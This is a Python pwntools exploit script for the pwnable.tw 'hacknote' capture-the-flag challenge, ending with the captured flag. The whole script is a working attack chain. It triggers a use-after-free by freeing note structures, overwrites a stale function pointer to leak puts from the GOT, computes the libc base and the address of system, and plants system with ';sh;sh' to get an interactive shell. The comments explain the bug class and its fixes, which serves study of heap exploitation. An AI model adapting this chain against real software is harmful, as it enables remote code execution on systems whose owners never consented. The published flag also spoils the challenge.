from pwn import *
# Exploit script for the pwnable.tw "hacknote" challenge, as posted on this page.
# The flag text on the page names the bug class: use-after-free in the note program.
# Defensive takeaway: a freed note's memory is reused and a stale function pointer
# is dispatched through; clearing pointers on free and avoiding heap-resident
# function pointers are the standard fixes for this class of bug.
# NOTE(review): Python 2-era pwntools. str payloads (sendline("1")) and the
# str+bytes concatenation p32(...)+";sh;sh" raise TypeError on Python 3.
s = remote("chall.pwnable.tw", 10102)
e = ELF("./hacknote")        # challenge binary; only e.got['puts'] is read from it
lib = ELF("./libc_32.so.6")  # challenge libc; gives the puts/system symbol offsets
#context.log_level = 'debug'
# Address inside the binary used as the overwritten function pointer.
# Presumably the note-print routine (the script expects it to puts() the
# following pointer) — confirm against the disassembly.
leakfunc =0x804862B
# Every recvuntil(":") below waits for the next menu/input prompt.
# Assumed menu numbering: 1 = add note (size, then content), 2 = delete note
# (index), 3 = print note (index) — TODO confirm against the binary's menu text.
# Two notes of size 1000 are created first.
s.recvuntil(":")
s.sendline('1')
s.recvuntil(":")
s.sendline("1000")
s.recvuntil(":")
s.sendline("hyomin")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("1000")
s.recvuntil(":")
s.sendline("hyomin2")
# Both notes are deleted (indices 1 then 0); the flag text indicates the freed
# note structures stay reachable afterwards.
s.recvuntil(":")
s.sendline("2")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("2")
s.recvuntil(":")
s.sendline("0")
# A new 8-byte note is created whose content is two packed pointers:
# leakfunc followed by the GOT slot of puts.
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("8")
s.recvuntil(":")
s.sendline(p32(leakfunc)+p32(e.got['puts']))
#s.sendline(p32(e.got['puts'])+"Hel")
# Printing note index 1 is expected to emit the resolved puts address.
s.recvuntil(":")
s.sendline("3")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
# Fragile: recv() returns whatever has arrived so far; fewer than 4 bytes makes
# u32() raise. The hex()/int(...,16) round trip is redundant — u32() is already an int.
libc =hex(u32(s.recv()[:4]))
base = int(libc,16) - int(lib.symbols['puts'])   # libc load base from the leaked puts
print("base :"+hex(base))
system = base + lib.symbols['system']
print("system :"+hex(system))
sleep(0.5)
# Delete note index 1 again, then recreate an 8-byte note whose content is the
# computed system address followed by ";sh;sh".
s.sendline("2")
s.recvuntil(":")
s.sendline("2")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("8")
s.recvuntil(":")
s.sendline(p32(system)+";sh;sh")
#s.sendline(p32(leakfunc)+p32(e.got['printf']))
# Print note index 1 once more, then hand the connection to the user.
s.recvuntil(":")
s.sendline("3")
s.recvuntil(":")
s.sendline("1")
s.recvuntil("Index :")
s.interactive()
FLAG{Us3_aft3r_fl3333_in_h4ck_not3}